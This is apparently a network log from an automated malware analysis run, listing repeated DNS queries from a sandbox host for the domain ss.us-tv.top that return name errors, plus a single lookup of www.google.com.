Nov 2, 2024 04:06:39.145653963 CET	192.168.2.15	1.1.1.1	0x1f80	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:39.152544975 CET	192.168.2.15	1.1.1.1	0x1f80	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:40.288646936 CET	192.168.2.15	1.1.1.1	0x2927	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:40.288773060 CET	192.168.2.15	1.1.1.1	0xa79f	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:40.295810938 CET	192.168.2.15	1.1.1.1	0x2927	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:40.295919895 CET	192.168.2.15	1.1.1.1	0xa79f	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:41.313529015 CET	192.168.2.15	1.1.1.1	0x65a7	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:41.313668966 CET	192.168.2.15	1.1.1.1	0x9937	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:41.320602894 CET	192.168.2.15	1.1.1.1	0x65a7	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:41.321069956 CET	192.168.2.15	1.1.1.1	0x9937	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:42.343111992 CET	192.168.2.15	1.1.1.1	0xced6	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:42.343256950 CET	192.168.2.15	1.1.1.1	0x4f94	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:42.350198030 CET	192.168.2.15	1.1.1.1	0xced6	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:42.350328922 CET	192.168.2.15	1.1.1.1	0x4f94	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:43.363470078 CET	192.168.2.15	1.1.1.1	0x75e0	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:43.364447117 CET	192.168.2.15	1.1.1.1	0x1048	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:43.370829105 CET	192.168.2.15	1.1.1.1	0x75e0	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:43.371717930 CET	192.168.2.15	1.1.1.1	0x1048	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:44.386030912 CET	192.168.2.15	1.1.1.1	0x9134	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:44.386461020 CET	192.168.2.15	1.1.1.1	0x424a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:44.393235922 CET	192.168.2.15	1.1.1.1	0x424a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:44.393838882 CET	192.168.2.15	1.1.1.1	0x9134	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:45.410371065 CET	192.168.2.15	1.1.1.1	0xd64c	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:45.410552025 CET	192.168.2.15	1.1.1.1	0x1ff2	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:45.417670012 CET	192.168.2.15	1.1.1.1	0x1ff2	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:45.418330908 CET	192.168.2.15	1.1.1.1	0xd64c	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:46.434827089 CET	192.168.2.15	1.1.1.1	0xda16	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:46.435097933 CET	192.168.2.15	1.1.1.1	0x1fb6	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:46.442027092 CET	192.168.2.15	1.1.1.1	0xda16	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:46.442533016 CET	192.168.2.15	1.1.1.1	0x1fb6	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:47.459819078 CET	192.168.2.15	1.1.1.1	0x2d4c	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:47.460038900 CET	192.168.2.15	1.1.1.1	0x384b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:47.467000961 CET	192.168.2.15	1.1.1.1	0x2d4c	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:47.467130899 CET	192.168.2.15	1.1.1.1	0x384b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:47.473673105 CET	192.168.2.15	1.1.1.1	0x384b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:48.608072996 CET	192.168.2.15	1.1.1.1	0xf3d9	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:48.608267069 CET	192.168.2.15	1.1.1.1	0x356b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:48.614835024 CET	192.168.2.15	1.1.1.1	0xf3d9	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:48.614892960 CET	192.168.2.15	1.1.1.1	0x356b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:48.621443033 CET	192.168.2.15	1.1.1.1	0x356b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:49.755570889 CET	192.168.2.15	1.1.1.1	0x1750	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:49.756479979 CET	192.168.2.15	1.1.1.1	0x52c3	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:49.762779951 CET	192.168.2.15	1.1.1.1	0x1750	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:49.763430119 CET	192.168.2.15	1.1.1.1	0x52c3	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:49.769737005 CET	192.168.2.15	1.1.1.1	0x1750	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:50.904227972 CET	192.168.2.15	1.1.1.1	0x107b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:50.905519962 CET	192.168.2.15	1.1.1.1	0xf1d5	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:50.910901070 CET	192.168.2.15	1.1.1.1	0x107b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:50.912647963 CET	192.168.2.15	1.1.1.1	0xf1d5	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:51.926184893 CET	192.168.2.15	1.1.1.1	0x3cf	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:51.926402092 CET	192.168.2.15	1.1.1.1	0xbecf	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:51.933269024 CET	192.168.2.15	1.1.1.1	0x3cf	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:51.933377981 CET	192.168.2.15	1.1.1.1	0xbecf	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:52.946983099 CET	192.168.2.15	1.1.1.1	0x2f17	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:52.949296951 CET	192.168.2.15	1.1.1.1	0x4d96	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:06:52.954163074 CET	192.168.2.15	1.1.1.1	0x2f17	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:06:52.956234932 CET	192.168.2.15	1.1.1.1	0x4d96	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 2, 2024 04:04:57.727274895 CET	1.1.1.1	192.168.2.15	0x913b	No error (0)	www.google.com			28	IN (0x0001)	false
Nov 2, 2024 04:04:57.728720903 CET	1.1.1.1	192.168.2.15	0x4a62	No error (0)	www.google.com		216.58.206.36	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:04:57.752116919 CET	1.1.1.1	192.168.2.15	0x3308	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:04:57.754827976 CET	1.1.1.1	192.168.2.15	0x5dc2	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:04:57.758702040 CET	1.1.1.1	192.168.2.15	0x3308	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:04:57.762818098 CET	1.1.1.1	192.168.2.15	0x5dc2	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:04:58.780798912 CET	1.1.1.1	192.168.2.15	0x26e6	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:04:58.781578064 CET	1.1.1.1	192.168.2.15	0x60e0	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:04:58.787395954 CET	1.1.1.1	192.168.2.15	0x26e6	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:04:58.788449049 CET	1.1.1.1	192.168.2.15	0x60e0	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:04:59.804910898 CET	1.1.1.1	192.168.2.15	0x6c83	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:04:59.805094957 CET	1.1.1.1	192.168.2.15	0x44d4	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:04:59.811583042 CET	1.1.1.1	192.168.2.15	0x6c83	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:04:59.811785936 CET	1.1.1.1	192.168.2.15	0x44d4	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:00.828200102 CET	1.1.1.1	192.168.2.15	0x4b94	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:00.828289032 CET	1.1.1.1	192.168.2.15	0xe9ba	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:00.834729910 CET	1.1.1.1	192.168.2.15	0xe9ba	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:01.448750973 CET	1.1.1.1	192.168.2.15	0x4b94	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:02.463515997 CET	1.1.1.1	192.168.2.15	0xba38	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:02.464231968 CET	1.1.1.1	192.168.2.15	0x4b28	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:02.470263958 CET	1.1.1.1	192.168.2.15	0xba38	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:02.597451925 CET	1.1.1.1	192.168.2.15	0x4b28	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:03.615262032 CET	1.1.1.1	192.168.2.15	0x11cf	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:03.615283012 CET	1.1.1.1	192.168.2.15	0x5048	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:03.622184992 CET	1.1.1.1	192.168.2.15	0x11cf	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:03.749113083 CET	1.1.1.1	192.168.2.15	0x5048	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:04.762768984 CET	1.1.1.1	192.168.2.15	0x6911	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:04.764048100 CET	1.1.1.1	192.168.2.15	0x916d	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:04.769368887 CET	1.1.1.1	192.168.2.15	0x6911	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:04.770637989 CET	1.1.1.1	192.168.2.15	0x916d	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:05.785640955 CET	1.1.1.1	192.168.2.15	0xa5dc	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:05.785985947 CET	1.1.1.1	192.168.2.15	0x1f80	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:05.792320013 CET	1.1.1.1	192.168.2.15	0xa5dc	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:05.792421103 CET	1.1.1.1	192.168.2.15	0x1f80	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:06.809132099 CET	1.1.1.1	192.168.2.15	0x444b	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:06.809173107 CET	1.1.1.1	192.168.2.15	0xe068	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:06.815691948 CET	1.1.1.1	192.168.2.15	0xe068	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:06.815747976 CET	1.1.1.1	192.168.2.15	0x444b	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:07.836299896 CET	1.1.1.1	192.168.2.15	0xd7e0	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:07.837770939 CET	1.1.1.1	192.168.2.15	0x9b68	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:07.844038010 CET	1.1.1.1	192.168.2.15	0xd7e0	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:07.845336914 CET	1.1.1.1	192.168.2.15	0x9b68	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:08.860435009 CET	1.1.1.1	192.168.2.15	0x4e78	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:08.865654945 CET	1.1.1.1	192.168.2.15	0xa439	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:08.867264032 CET	1.1.1.1	192.168.2.15	0x4e78	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:08.872721910 CET	1.1.1.1	192.168.2.15	0xa439	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:09.886970997 CET	1.1.1.1	192.168.2.15	0x4a46	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:09.889484882 CET	1.1.1.1	192.168.2.15	0xec26	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:09.893631935 CET	1.1.1.1	192.168.2.15	0x4a46	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:10.024749041 CET	1.1.1.1	192.168.2.15	0xec26	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:11.040380955 CET	1.1.1.1	192.168.2.15	0x452f	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:11.041069031 CET	1.1.1.1	192.168.2.15	0x668f	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:11.047600031 CET	1.1.1.1	192.168.2.15	0x668f	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:11.173207998 CET	1.1.1.1	192.168.2.15	0x452f	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:12.187705994 CET	1.1.1.1	192.168.2.15	0xc139	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:12.188047886 CET	1.1.1.1	192.168.2.15	0xda52	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:12.194720984 CET	1.1.1.1	192.168.2.15	0xc139	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:12.195132017 CET	1.1.1.1	192.168.2.15	0xda52	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:13.212321997 CET	1.1.1.1	192.168.2.15	0x2e8e	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:13.212560892 CET	1.1.1.1	192.168.2.15	0xf4b2	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:13.219393969 CET	1.1.1.1	192.168.2.15	0x2e8e	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:13.346046925 CET	1.1.1.1	192.168.2.15	0xf4b2	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:14.361994028 CET	1.1.1.1	192.168.2.15	0x314b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:14.362294912 CET	1.1.1.1	192.168.2.15	0x8099	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:14.368834972 CET	1.1.1.1	192.168.2.15	0x8099	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:14.368855953 CET	1.1.1.1	192.168.2.15	0x314b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:15.387309074 CET	1.1.1.1	192.168.2.15	0x9104	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:15.387341976 CET	1.1.1.1	192.168.2.15	0x2222	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:15.394228935 CET	1.1.1.1	192.168.2.15	0x2222	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:15.525378942 CET	1.1.1.1	192.168.2.15	0x9104	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:16.543198109 CET	1.1.1.1	192.168.2.15	0xc589	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:16.543255091 CET	1.1.1.1	192.168.2.15	0xd477	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:16.550036907 CET	1.1.1.1	192.168.2.15	0xc589	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:16.550048113 CET	1.1.1.1	192.168.2.15	0xd477	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:17.568850040 CET	1.1.1.1	192.168.2.15	0x4887	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:17.569185972 CET	1.1.1.1	192.168.2.15	0x6926	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:17.575500011 CET	1.1.1.1	192.168.2.15	0x4887	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:17.575742960 CET	1.1.1.1	192.168.2.15	0x6926	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:18.594183922 CET	1.1.1.1	192.168.2.15	0x959f	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:18.596385956 CET	1.1.1.1	192.168.2.15	0x35bb	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:18.601155996 CET	1.1.1.1	192.168.2.15	0x959f	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:18.603025913 CET	1.1.1.1	192.168.2.15	0x35bb	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:19.621537924 CET	1.1.1.1	192.168.2.15	0xf511	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:19.628240108 CET	1.1.1.1	192.168.2.15	0xf511	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:19.863389015 CET	1.1.1.1	192.168.2.15	0xd678	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:19.996587992 CET	1.1.1.1	192.168.2.15	0xd678	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:21.011019945 CET	1.1.1.1	192.168.2.15	0x8184	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:21.011217117 CET	1.1.1.1	192.168.2.15	0xdf14	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:21.017721891 CET	1.1.1.1	192.168.2.15	0x8184	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:21.143208027 CET	1.1.1.1	192.168.2.15	0xdf14	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:22.162930965 CET	1.1.1.1	192.168.2.15	0x8ab6	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:22.162946939 CET	1.1.1.1	192.168.2.15	0x711a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:22.169600964 CET	1.1.1.1	192.168.2.15	0x711a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:22.169611931 CET	1.1.1.1	192.168.2.15	0x8ab6	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:23.192668915 CET	1.1.1.1	192.168.2.15	0x8c04	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:23.199286938 CET	1.1.1.1	192.168.2.15	0x8c04	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:23.761023998 CET	1.1.1.1	192.168.2.15	0x75c	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:23.768376112 CET	1.1.1.1	192.168.2.15	0x75c	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:24.788258076 CET	1.1.1.1	192.168.2.15	0xa16d	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:24.788511038 CET	1.1.1.1	192.168.2.15	0x83c5	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:24.794872046 CET	1.1.1.1	192.168.2.15	0xa16d	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:24.795178890 CET	1.1.1.1	192.168.2.15	0x83c5	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:25.814594984 CET	1.1.1.1	192.168.2.15	0xfec7	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:25.814894915 CET	1.1.1.1	192.168.2.15	0xda74	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:25.821379900 CET	1.1.1.1	192.168.2.15	0xfec7	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:25.821574926 CET	1.1.1.1	192.168.2.15	0xda74	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:26.843390942 CET	1.1.1.1	192.168.2.15	0x6594	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:26.845753908 CET	1.1.1.1	192.168.2.15	0xe171	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:26.850158930 CET	1.1.1.1	192.168.2.15	0x6594	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:26.852509975 CET	1.1.1.1	192.168.2.15	0xe171	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:27.870696068 CET	1.1.1.1	192.168.2.15	0xc661	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:27.875292063 CET	1.1.1.1	192.168.2.15	0xf71b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:27.877376080 CET	1.1.1.1	192.168.2.15	0xc661	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:28.010268927 CET	1.1.1.1	192.168.2.15	0xf71b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:29.027987003 CET	1.1.1.1	192.168.2.15	0x7289	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:29.034616947 CET	1.1.1.1	192.168.2.15	0x7289	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:29.109244108 CET	1.1.1.1	192.168.2.15	0x5d7a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:29.116435051 CET	1.1.1.1	192.168.2.15	0x5d7a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:30.133575916 CET	1.1.1.1	192.168.2.15	0x114c	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:30.133594990 CET	1.1.1.1	192.168.2.15	0x41ef	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:30.140201092 CET	1.1.1.1	192.168.2.15	0x114c	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:30.140391111 CET	1.1.1.1	192.168.2.15	0x41ef	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:31.157933950 CET	1.1.1.1	192.168.2.15	0xf443	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:31.159229040 CET	1.1.1.1	192.168.2.15	0x65c5	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:31.164486885 CET	1.1.1.1	192.168.2.15	0xf443	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:31.166008949 CET	1.1.1.1	192.168.2.15	0x65c5	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:32.184824944 CET	1.1.1.1	192.168.2.15	0x8c46	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:05:32.186275005 CET	1.1.1.1	192.168.2.15	0x10d4	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:32.191695929 CET	1.1.1.1	192.168.2.15	0x8c46	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
